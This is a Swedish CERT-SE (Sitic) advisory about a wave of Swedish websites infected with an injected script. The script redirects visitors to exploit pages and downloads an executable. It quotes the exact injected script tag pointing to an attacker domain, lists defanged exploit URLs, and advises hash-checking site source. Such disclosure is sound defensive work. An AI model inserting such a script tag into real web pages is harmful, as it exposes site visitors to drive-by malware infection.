Som du ser är vår webbplats inte anpassad för äldre webbläsare. Vi rekommenderar att du uppgraderar till en nyare webbläsare.
!!

Jobba på CERT-SE? Nu söker vi en förvaltningsledare IT inom cybersäkerhet med sista ansökningsdag 17 augusti, samt en administrativ stjärna med it-säkerhetskunskap till vår desk med sista ansökningsdag 23 augusti.

Uppdaterad | Publicerad

Flertalet svenska hemsidor infekterade

Ett stort antal svenska hemsidor har de senaste veckorna blivit infekterade med skadlig kod.

De senaste veckorna har ett stort antal svenska hemsidor blivit infekterade med skadlig kod. Ett litet java-script har lagt till i källkoden på hemsidorna. Koden skickar i tysthet besökaren vidare till en hemsida där skadlig kod försöker installeras på besökarens
dator. Allt sker i bakgrunden så användaren ser inte att detta sker.

En sökning på Google ger snabbt svar på hemsidor som är eller har varit infekterade:

http://www.google.se/search?hl=sv&q=%3Cscript+src%3D%22http%3A%2F%2F%22+%22%2F1.js%22+&btnG=Sök&meta=cr%3DcountrySE

Koden som läggs till på hemsidan är: "<script src=http://www.nihaorr1.com/1.js>".

Efter att man hämtat hem "1.js" slussas klienten vidare till olika sidor som försöker infektera klienten:

hxxp://www.nihaorr1.com/cuteqq.htm

hxxp://www.nihaorr1.com/Ms07055.htm

hxxp://www.nihaorr1.com/Yahoo.php

hxxp://www.nihaorr1.com/cuteqq.htm

hxxp://www.nihaorr1.com/Ms07055.htm

hxxp://www.nihaorr1.com/Ms07033.htm

hxxp://www.nihaorr1.com/Ms07018.htm

hxxp://www.nihaorr1.com/Ms07004.htm

hxxp://www.nihaorr1.com/Ajax.htm

hxxp://www.nihaorr1.com/Ms06014.htm

Vid lyckad exploatering laddas "hxxp://www.nihaorr1.com/test.exe" ned och exekveras.

Webbservern som www.nihaorr1.com pekar på svarar i nuläget inte på HTTP-anrop på port 80. Sitic rekommenderar att man kontinuerligt verifierar att källkoden på ens webbserver inte modifierats. Det kan göras med hjälp av hash-funktioner som MD5 eller SHA1 alternativt att man jämför med koden i sitt "repository".